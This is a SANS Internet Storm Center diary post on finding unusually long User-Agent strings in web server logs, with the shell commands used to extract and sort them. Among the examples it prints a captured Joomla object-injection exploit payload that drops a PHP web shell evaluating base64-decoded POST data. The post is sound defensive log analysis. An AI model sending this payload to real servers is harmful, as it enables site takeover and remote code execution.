Threat Level: green Handler on Duty: John Bambenek

SANS ISC: Internet Storm Center - Internet Security | DShield Internet Storm Center


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Latest Diaries

ISC Stormcast For Wednesday, June 29th 2016 http://isc.sans.edu/podcastdetail.html?id=5061

What is your most unusual User-Agent?

Published: 2016-06-29
Last Updated: 2016-06-29 00:55:34 UTC
by Johannes Ullrich (Version: 1)
1 comment(s)

When looking at my web logs, I am always out to hunt for anomalies. Today, after seeing some odd and long user agents, I figured it would be fun to look for the longest once that I can find in my logs. First of all: how?

Fist, I am extracting the User Agent string from my web server access log:

cut -f 6 -d'"' access_log > /tmp/useragents 
 (this may look different for you if you use a different log format)

Next, sorting the result by line length:

cat /tmp/useragents | awk '{ print length, $0 }' | sort -n -s | cut -d" " -f2- | uniq

So finally some of the "winners"

Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0 OWASMIME/4.0500 (...) 
 OWASMIME/4.0500 is repeated many times.  No idea what this is about. A buggy script?
}__test|O:21:\x22JDatabaseDriverMysqli\x22:3:{s:2:\x22fc\x22;
O:17:\x22JSimplepieFactory\x22:0:{}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;
a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:{s:8:\x22sanitize\x22;
O:20:\x22JDatabaseDriverMysql\x22:0:{}s:8:\x22feed_url\x22;
s:254:\x22file_put_contents($_SERVER[\x22DOCUMENT_ROOT\x22].chr(47).\x22images\x22.
chr(47).\x22main.php\x22,\x22|=|\x5Cx3C\x22.chr(63).\x22php \x5Cx24mujj=\x5Cx24_POST['@123'];if(\x5Cx24mujj!='')
{\x5Cx24xsser=base64_decode(\x5Cx24_POST['z0']);
@eval(\x5C\x22\x5C\x5C\x5Cx24safedg=\x5Cx24xsser;\x5C\x22);}\x22);
JFactory::getConfig();exit;\x22;s:19:\x22cache_name_function\x22;
s:6:\x22assert\x22;s:5:\x22cache\x22;b:1;s:11:\x22cache_class\x22;
O:20:\x22JDatabaseDriverMysql\x22:0:{}}i:1;s:4:\x22init\x22;}}s:13:\x22\x5C0\x5C0\x5C0connection\x22;b:1;}~\xD9

An exploit for an OLD Joomla issue if I remember right? This stuff still works?

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; 
.NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; Tablet PC 2.0;
 GWX:MANAGED; GWX:DOWNLOADED; GWX:QUALIFIED; InfoPath.3; MALCJS; 
Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; 
Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; 
Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; 
Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; 
Microsoft Outlook 15.0.4833; ms-office; MSOffice 15)

Again. Lots of duplicate content. Do you REALLY have to tell me what version of Outlook you are running? I know you are proud of your tablet...

Oddly enough, no shell shock today. 

What is your longest User-Agent if you search your weblogs?

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

Keywords:
1 comment(s)

If you have more information or corrections regarding our diary, please share.

Recent Diaries

DDoS Extortion - Almost Universally an Empty Threat
1 day ago by John (2 comments)

Bart - a new Ransomware
2 days ago by Rick (8 comments)

An Approach to Vulnerability Management
5 days ago by Russell (12 comments)

Security through obscurity never works
6 days ago by Bojan (0 comments)

View All Diaries →

Latest Discussions

Tracking EoL Software
created 5 days ago by SaltedSecurity (2 replies)

Past Data in TSV File from Feed
created 2 weeks ago by Palladion (1 reply)

Updating network object in ASA thru API
created 2 weeks ago by Krypt0ni8 (6 replies)

hailataxii.com
created 3 weeks ago by Anonymous (0 replies)

Google's No Password feature - Security Sucks these days
created 3 weeks ago by Anonymous (1 reply)

View All Forums →

Latest News

View All News →

Top Diaries

Critical Cisco ASA IKEv1/v2 Vulnerability. Active Scanning Detected
4 months ago by Dr. J. (24 comments)

An Approach to Vulnerability Management
5 days ago by Russell (12 comments)

Microsoft Patch Tuesday Summary for May 2016
1 month ago by Alex Stanford (5 comments)

Neutrino exploit kit sends Cerber ransomware
1 month ago by Brad (5 comments)

Controlling JavaScript Malware Before it Runs
1 week ago by Rob VandenBrink (5 comments)